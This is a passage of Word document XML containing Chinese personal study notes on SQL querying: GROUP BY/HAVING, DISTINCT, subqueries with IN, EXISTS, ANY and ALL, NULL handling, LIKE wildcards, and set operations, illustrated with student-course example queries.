        <w:t>使用了以后每一个组会只有一行，所以一般都是配合聚合函数进行使用）。</w:t>
      </w:r>
      <w:r>
        <w:t>having</w:t>
      </w:r>
      <w:r>
        <w:t>可以在没有</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>的情况下独立使用，相当于</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>子句。分组查询的</w:t>
      </w:r>
      <w:r>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>目标列中只允许出现聚集函数和</w:t>
      </w:r>
      <w:r>
        <w:t>GROUP BY</w:t>
      </w:r>
      <w:r>
        <w:t>子句中出现过的列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>[ORDER BY &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t>2&gt; [ASC|DESC]];  NULL</w:t>
      </w:r>
      <w:r>
        <w:t>值在排序的时候被认为是最大值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>DISTINCT</w:t>
      </w:r>
      <w:r>
        <w:t>还有种写法是：</w:t>
      </w:r>
      <w:r>
        <w:t>seletct distinct on(</w:t>
      </w:r>
      <w:r>
        <w:t>字段名字</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:r>
        <w:t>剩余部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>注意是否使用</w:t>
      </w:r>
      <w:r>
        <w:t>distinct</w:t>
      </w:r>
      <w:r>
        <w:t>，尤其是输出为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>列的时候。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">group by </w:t>
      </w:r>
      <w:r>
        <w:t>可以达到</w:t>
      </w:r>
      <w:r>
        <w:t>distinct</w:t>
      </w:r>
      <w:r>
        <w:t>的目的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT Sname, Sdept, Sage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  FROM Student</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  WHERE Sage IN (20,21,22,23);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>IN</w:t>
      </w:r>
      <w:r>
        <w:t>后面可以是一个</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>选择语句，</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>后面这部分也可以是。甚至有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">where </w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:t>=(select xx from ...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select * from A,B;  </w:t>
      </w:r>
      <w:r>
        <w:t>得到的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的笛卡尔积。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT Sno, Cno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  FROM SC x </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  WHERE Grade&gt;=(SELECT AVG(Grade)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">                            FROM SC y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">                            WHERE y.Sno=x.Sno);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT Sno FROM SC WHERE Grade&gt;=80 GROUP BY Sno HAVING (COUNT(Cno)&gt;=3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT Sname, '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>Year of Birth:'</w:t>
      </w:r>
      <w:r>
        <w:t>, 2004-Sage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> as sage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>LOWER(Sdept)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FROM Student; </w:t>
      </w:r>
      <w:r>
        <w:t>选中了字段，但是现实</w:t>
      </w:r>
      <w:r>
        <w:t>Sdept</w:t>
      </w:r>
      <w:r>
        <w:t>字段的时候使用了函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">SELECT DISTINCT Sno FROM SC; </w:t>
      </w:r>
      <w:r>
        <w:t>消除重复的</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>比较</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>常用</w:t>
      </w:r>
      <w:r>
        <w:t>=,&gt;,&lt;,&gt;=,&lt;=,!=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>确定范围</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BETWEEN AND, NOT BETWEEN AND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>确定集合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IN,NOT IN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>修饰</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IS</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">IS NOT  </w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:r>
        <w:t>注意：有的系统允许</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>比较，可以使用＝和</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>，如</w:t>
      </w:r>
      <w:r>
        <w:t>MS SQL Server</w:t>
      </w:r>
      <w:r>
        <w:t>。有的不允许，如</w:t>
      </w:r>
      <w:r>
        <w:t>Oracle,PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>等。</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>标准不允许。</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>如果不被支持一般的比较，那么</w:t>
      </w:r>
      <w:r>
        <w:t>where xx=2</w:t>
      </w:r>
      <w:r>
        <w:t>的实现代码中就要将</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>额外排除</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>多重条件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AND, OR, NOT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT Sname, Sgender FROM Student WHERE Sdept NOT IN (‘CS’,’MA’,’IS’); IN</w:t>
      </w:r>
      <w:r>
        <w:t>的数据集直接使用常量来表示的话</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>在有</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>的情况下，二值逻辑转化为三值逻辑，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unknown </w:t>
      </w:r>
      <w:r>
        <w:t>介于</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>之间。而</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>只会选择出</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>where columnname like xxxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>数据库里面的通配符比正则里面的简单，范围也就大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>代替一个或者多个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>仅仅代替一个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>[charlist]</w:t>
      </w:r>
      <w:r>
        <w:t>字符列中任意个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>[^charlist]</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>[!charlist]</w:t>
      </w:r>
      <w:r>
        <w:t>字符列中不存在的任意个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">SELECT c1 FROM tb WHERE c1 LIKE '%10!%-15!% off%' ESCAPE '!' ; </w:t>
      </w:r>
      <w:r>
        <w:t>指定转义字符是</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>语言中，一个</w:t>
      </w:r>
      <w:r>
        <w:t>SELECT-FROM-WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>语句称为一个查询块。将一个查询块嵌套在另一个查询块的</w:t>
      </w:r>
      <w:r>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>子句或</w:t>
      </w:r>
      <w:r>
        <w:t>HAVING</w:t>
      </w:r>
      <w:r>
        <w:t>短语的条件中的查询称为嵌套查询或子查询。子查询修饰符：</w:t>
      </w:r>
      <w:r>
        <w:t>ANY</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>SOME</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">Some R </w:t>
      </w:r>
      <w:r>
        <w:t>意义为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Some in R</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>中的某一个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">All R </w:t>
      </w:r>
      <w:r>
        <w:t>意义为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  all  in R, </w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all of R</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>中的全部。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>SELECT Sname, Sage FROM Student WHERE Sage &lt; ANY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(SELECT Sage FROM Student WHERE Sdept=‘CS’ ) AND Sdept &lt;&gt; ‘CS‘;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">EXISTS </w:t>
      </w:r>
      <w:r>
        <w:t>只返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">true </w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>SELECT Sname FROM Student WHERE EXISTS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">(SELECT * FROM SC WHERE Sno=Student.Sno AND Cno='1'); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select PNAME,COUNT(*) from P,SPJ where P.PNO=SPJ.PNO and SPJ.JNO='J2' group by PNO;</w:t>
      </w:r>
      <w:r>
        <w:t>这个语句是错误的，数据库依旧需要你告诉它是哪个表下面的</w:t>
      </w:r>
      <w:r>
        <w:t>PNO</w:t>
      </w:r>
      <w:r>
        <w:t>。数据库看到了两个字段的相等，但是组合成的表格应该是同时又</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">P.PNO </w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPJ.PNO</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select sno </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  from sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  where cno in </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  ( select cno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">      from course</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">      where cname='</w:t>
      </w:r>
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>》</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select sno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  from sc, course c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  where sc.cno=c.cno and cname='</w:t>
      </w:r>
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>》使用</w:t>
      </w:r>
      <w:r>
        <w:t>exists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select rowid from Courses where CourseId=CourseId and ClassId=ClassId and ClassRemaining!=ClassRemaining;  </w:t>
      </w:r>
      <w:r>
        <w:t>这种语句如果放在不同名字的表中倒是可以联合查询，但是仅仅使用一个表，对自己进行判断只能依赖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>走一个名字重命名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select rowid from Courses as T1 where  exists (select * from Courses as A  where T1.CourseId=A.CourseId and T1.TeachingDay=A.TeachingDay and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRemaining) group by CourseId</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选修了全部课程的学生姓名</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">SELECT Sname FROM Student WHERE NOT EXISTS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">(SELECT * FROM Course WHERE NOT EXISTS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(SELECT * FROM SC WHERE Student.Sno=SC.Sno AND Course.Cno=Cno));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果一个学生选了所有的课程那么</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">(SELECT * FROM Course WHERE NOT EXISTS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(SELECT * FROM SC WHERE Student.Sno=SC.Sno AND Course.Cno=Cno));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>会返回一个空结果，对应为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>集合操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r>
        <w:t>要想不消除重复就要在每一个关键词后面加上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ALL  </w:t>
      </w:r>
      <w:r>
        <w:t>可以借助</w:t>
      </w:r>
      <w:r>
        <w:t>EXISTS</w:t>
      </w:r>
      <w:r>
        <w:t>和嵌套查询来实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>并</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UNION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>交</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> INTERSECT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>差</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>(SELECT Sno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  FROM Student</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  WHERE Sdept=‘MA’)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">INTERSECT </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>(SELECT Sno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  FROM SC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  WHERE Cno=‘3’);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select PNO from SPJ A where SNO='S1' </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select PNO from SPJ B where A.SNO=TMP.SNO;  </w:t>
      </w:r>
      <w:r>
        <w:t>上面声明一个</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>表，第二条子查询语句并不能使用这个</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">group by having </w:t>
      </w:r>
      <w:r>
        <w:t>子句中</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>判断实现，可以实现</w:t>
      </w:r>
      <w:r>
        <w:t>intersect</w:t>
      </w:r>
      <w:r>
        <w:t>的功能：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select Cause, Rate   from (  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> select Cause, Rate from A1  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  union all  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> select Cause, Rate from A2)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> group by Cause, Rate   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>having count(*) &gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果仅仅是判断一个集合是不是另外一个集合的子集：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>EXCEPT</w:t>
      </w:r>
      <w:r>
        <w:t>，然后通过</w:t>
      </w:r>
      <w:r>
        <w:t>EXISTS</w:t>
      </w:r>
      <w:r>
        <w:t>进行判断，集合减操作以后是否为空。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>集函数（把一群输入集在一起，得到一个输出）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">COUNT([DISTINCT|ALL] *) </w:t>
      </w:r>
      <w:r>
        <w:t>统计元组个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>注：</w:t>
      </w:r>
